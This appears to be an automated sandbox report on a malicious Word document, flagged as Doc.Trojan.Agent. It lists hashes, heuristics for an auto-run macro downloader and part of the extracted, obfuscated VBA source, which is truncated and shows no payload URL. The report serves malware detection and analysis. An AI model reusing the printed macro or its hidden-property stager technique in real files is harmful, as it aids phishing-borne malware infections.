Office (OLE) malware analysis — malicious · a73f1a8c88bf4c4f

MALICIOUS

Office (OLE)

205.0 KB Created: 2019-12-19 06:37:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 610d5ad750cd9d01778f899a43dedd43 SHA-1: bd928ea4eb6578556e81a8dfce4a23cef38725e5 SHA-256: a73f1a8c88bf4c4fecbd807a28bc3191cdf37c677ee723d464d463f207a9eeb3

302 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro and a UserForm hidden-property command stager, which are indicative of malicious intent. The presence of these elements suggests the document is designed to execute arbitrary code, likely to download and run a second-stage payload. The ClamAV detection further supports its malicious classification.

Heuristics 8

ClamAV: Doc.Trojan.Agent-7431341-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Agent-7431341-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13345 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13345 bytes
SHA-256: `2272c1115285e749c4d0b248c742636e0744e0ab9b3ec020ae81294671298877`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Ozshzqjd" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Ufstywhugmwo, 0, 0, MSForms, TextBox" Private Sub Document_open() Kwgyoxrq = "Camille" Dim Lvjyxvxub As Boolean Dim Sbytdjqvzbesy As Double Gocbnwkgl = ("Molestias.") Dim Ygodncohrvif As Double Dim Bvcdhclwroi As Double Dim Kaiunill As Integer Voberkkyj = Mbhcdihcoav Dim Egjbuwzb As Boolean Hpfxtlhqyzm = ("Itaque nesciunt itaque veritatis necessitatibus voluptatibus mollitia sit impedit similique.") Dim Arjadjwgzszak As String Dim Dntlvmanyk As String Dim Gkxwpghiklv As String Uihwfwjjymkg = "Dolores id atque." Dim Madlqpsp As Double Dim Wjuctzsr As Integer Dim Bdtqsndhixmp As Boolean Uhgafgzfm = ("Candice") Dim Wchqzttjhaihn As Integer Llgyqhup = 668 Ssmqtwroqw = Rjetghdlashcu Nosbmzegbhsne = 729 Aqymlywilg Stwmosksgoxkq = "Ea." Dim Gdfguodpcr As Boolean Dim Xkejttxzo As Integer Xtjtupgoi = ("Quia hic assumenda debitis id deserunt.") Dim Qgdynipdtuplm As Integer Dim Edqtoyhy As Boolean Dim Kujzwdqdztx As Double Gokkejhhwlrk = Pnaihukcngdxq Dim Nofyijeen As Integer Afoirptgaqz = ("Sed incidunt molestias incidunt impedit ab commodi veniam rem eum.") Dim Lkeadhgtizi As Boolean Dim Ltnkjmftuf As String Dim Ooekyrndp As Double Fdagwvrgfmfdz = "Accusamus asperiores et et perspiciatis possimus est perferendis cupiditate." Dim Gmfwrfrvpsc As Integer Dim Hutwyvigjg As Double Dim Cyhsikeqilbyt As Integer Oiknulhyltjf = ("Et optio.") Dim Iwgwypgjch As Integer Sbwtuccbuyyso = 487 Awzzfafapubu = Efdfwtgcryg Rkxoimuf = 107 End Sub Attribute VB_Name = "Sqqlhtxfpmdb" Attribute VB_Base = "0{C2E295E7-ED9E-44C9-BBBA-EF1412C18D8E}{94624045-EFE1-4E8D-9772-72355EA0E52F}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Pbxqeoszuxx" Function Reycbswedx() Otgsfmxppv = "Et vitae saepe eos illum excepturi non." Dim Iwmmfhfv As String Dim Lziuheiknsarn As Integer Fbmhdpzeoe = ("Id maxime ea itaque.") Dim Drdzlvrihjk As Integer Dim Hfhgcqidbzfs As Boolean Dim Hlvuqqreskt As Boolean Wadvqhovjsxmo = Brxhxhkxlp Dim Bdmxnntmdye As String Arxtxicihd = ("Aut est.") Dim Mroldrgwtm As Double Dim Ukyuvgdmiwxqm As String Dim Gsfualkbwea As String Ysrnybynk = "Sarah" Dim Azpeptyzzdz As Double Dim Sslkjbpvfxn As String Dim Jrlfawkst As Double Glcgabczocvg = ("Neque.") Dim Eirsvbbojjg As Boolean Ddtvyrpexyju = 833 Obcolvrwnszy = Rbszmhzvugwo Gjiyqgmnhv = 746 Fzpfdckgdauvb = Ozshzqjd.Ufstywhugmwo Lohnyjtfuj = "Ignacio" Dim Cqetookvsbbh As Boolean Dim Aiwgklmfidub As String Oauiatluqhcv = ("Ipsum asperiores ut dignissimos explicabo voluptate.") Dim Tknzggil As String Dim Yrgxiaznetg As String Dim Shmggsoep As Boolean Lyquvdjds = Jmnmqipqax Dim Urtzbttj As Integer Yljjesbjdybiy = ("Porro.") Dim Ubgpzqljuvcb As String Dim Kzwajoccg As Boolean Dim Ortdcmttggrmu As String Nbonbqxbtz = "Impedit totam accusamus voluptatem." Dim Olqsvdskz As Double Dim Sjjhxbtmc As Integer Dim Bansbgrp As Boolean Xdfipovj = ("Vel.") Dim Jvuwdsja As Integer Ncrmkqfc = 624 Sjrdvfdyhn = Aqrffroi Papvlsyzjth = 275 Bwfpnhywpikk = Fzpfdckgdauvb + Sqqlhtxfpmdb.Mqgcunaedy + Sqqlhtxfpmdb.Nierknvlxv + Sqqlhtxfpmdb.Igerfiahvc Nfsiyiidko = "Aperiam aut qui dolor." Dim Mobntxqbrts As Boolean Dim Imxbptvvtresa As String Jotnkjkmb = ("Doloribus molestias porro.") Dim Vresunylpvlcv As String Dim Stxwutwksca As Boolean Dim Nyavkrxdrb As String Uolkymxstqr = Weyhmqtio Dim Upsexmbsafae As Double Uqdmqxhmqomzw = ("Sequi consequatur.") Dim Difqtqiusv As Double Dim Zoawznhsaqw As Integer Dim Kiydsyqw As Boolean Wuorjlvkqjhhx = "Lana" Dim Mlomkmlhpjhj As Boolean Dim Xqtrqdbl As Double Dim Gegfotckilfmb A ... (truncated)

SHA-256: 2272c1115285e749c4d0b248c742636e0744e0ab9b3ec020ae81294671298877

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Ozshzqjd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Ufstywhugmwo, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Kwgyoxrq = "Camille"
Dim Lvjyxvxub As Boolean
Dim Sbytdjqvzbesy As Double
Gocbnwkgl = ("Molestias.")
Dim Ygodncohrvif As Double
Dim Bvcdhclwroi As Double
Dim Kaiunill As Integer
Voberkkyj = Mbhcdihcoav
Dim Egjbuwzb As Boolean
Hpfxtlhqyzm = ("Itaque nesciunt itaque veritatis necessitatibus voluptatibus mollitia sit impedit similique.")
Dim Arjadjwgzszak As String
Dim Dntlvmanyk As String
Dim Gkxwpghiklv As String
Uihwfwjjymkg = "Dolores id atque."
Dim Madlqpsp As Double
Dim Wjuctzsr As Integer
Dim Bdtqsndhixmp As Boolean
Uhgafgzfm = ("Candice")
Dim Wchqzttjhaihn As Integer
Llgyqhup = 668
Ssmqtwroqw = Rjetghdlashcu
Nosbmzegbhsne = 729
Aqymlywilg
   Stwmosksgoxkq = "Ea."
Dim Gdfguodpcr As Boolean
Dim Xkejttxzo As Integer
Xtjtupgoi = ("Quia hic assumenda debitis id deserunt.")
Dim Qgdynipdtuplm As Integer
Dim Edqtoyhy As Boolean
Dim Kujzwdqdztx As Double
Gokkejhhwlrk = Pnaihukcngdxq
Dim Nofyijeen As Integer
Afoirptgaqz = ("Sed incidunt molestias incidunt impedit ab commodi veniam rem eum.")
Dim Lkeadhgtizi As Boolean
Dim Ltnkjmftuf As String
Dim Ooekyrndp As Double
Fdagwvrgfmfdz = "Accusamus asperiores et et perspiciatis possimus est perferendis cupiditate."
Dim Gmfwrfrvpsc As Integer
Dim Hutwyvigjg As Double
Dim Cyhsikeqilbyt As Integer
Oiknulhyltjf = ("Et optio.")
Dim Iwgwypgjch As Integer
Sbwtuccbuyyso = 487
Awzzfafapubu = Efdfwtgcryg
Rkxoimuf = 107
End Sub

Attribute VB_Name = "Sqqlhtxfpmdb"
Attribute VB_Base = "0{C2E295E7-ED9E-44C9-BBBA-EF1412C18D8E}{94624045-EFE1-4E8D-9772-72355EA0E52F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Pbxqeoszuxx"
Function Reycbswedx()
   Otgsfmxppv = "Et vitae saepe eos illum excepturi non."
Dim Iwmmfhfv As String
Dim Lziuheiknsarn As Integer
Fbmhdpzeoe = ("Id maxime ea itaque.")
Dim Drdzlvrihjk As Integer
Dim Hfhgcqidbzfs As Boolean
Dim Hlvuqqreskt As Boolean
Wadvqhovjsxmo = Brxhxhkxlp
Dim Bdmxnntmdye As String
Arxtxicihd = ("Aut est.")
Dim Mroldrgwtm As Double
Dim Ukyuvgdmiwxqm As String
Dim Gsfualkbwea As String
Ysrnybynk = "Sarah"
Dim Azpeptyzzdz As Double
Dim Sslkjbpvfxn As String
Dim Jrlfawkst As Double
Glcgabczocvg = ("Neque.")
Dim Eirsvbbojjg As Boolean
Ddtvyrpexyju = 833
Obcolvrwnszy = Rbszmhzvugwo
Gjiyqgmnhv = 746
Fzpfdckgdauvb = Ozshzqjd.Ufstywhugmwo
   Lohnyjtfuj = "Ignacio"
Dim Cqetookvsbbh As Boolean
Dim Aiwgklmfidub As String
Oauiatluqhcv = ("Ipsum asperiores ut dignissimos explicabo voluptate.")
Dim Tknzggil As String
Dim Yrgxiaznetg As String
Dim Shmggsoep As Boolean
Lyquvdjds = Jmnmqipqax
Dim Urtzbttj As Integer
Yljjesbjdybiy = ("Porro.")
Dim Ubgpzqljuvcb As String
Dim Kzwajoccg As Boolean
Dim Ortdcmttggrmu As String
Nbonbqxbtz = "Impedit totam accusamus voluptatem."
Dim Olqsvdskz As Double
Dim Sjjhxbtmc As Integer
Dim Bansbgrp As Boolean
Xdfipovj = ("Vel.")
Dim Jvuwdsja As Integer
Ncrmkqfc = 624
Sjrdvfdyhn = Aqrffroi
Papvlsyzjth = 275
Bwfpnhywpikk = Fzpfdckgdauvb + Sqqlhtxfpmdb.Mqgcunaedy + Sqqlhtxfpmdb.Nierknvlxv + Sqqlhtxfpmdb.Igerfiahvc
   Nfsiyiidko = "Aperiam aut qui dolor."
Dim Mobntxqbrts As Boolean
Dim Imxbptvvtresa As String
Jotnkjkmb = ("Doloribus molestias porro.")
Dim Vresunylpvlcv As String
Dim Stxwutwksca As Boolean
Dim Nyavkrxdrb As String
Uolkymxstqr = Weyhmqtio
Dim Upsexmbsafae As Double
Uqdmqxhmqomzw = ("Sequi consequatur.")
Dim Difqtqiusv As Double
Dim Zoawznhsaqw As Integer
Dim Kiydsyqw As Boolean
Wuorjlvkqjhhx = "Lana"
Dim Mlomkmlhpjhj As Boolean
Dim Xqtrqdbl As Double
Dim Gegfotckilfmb A
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.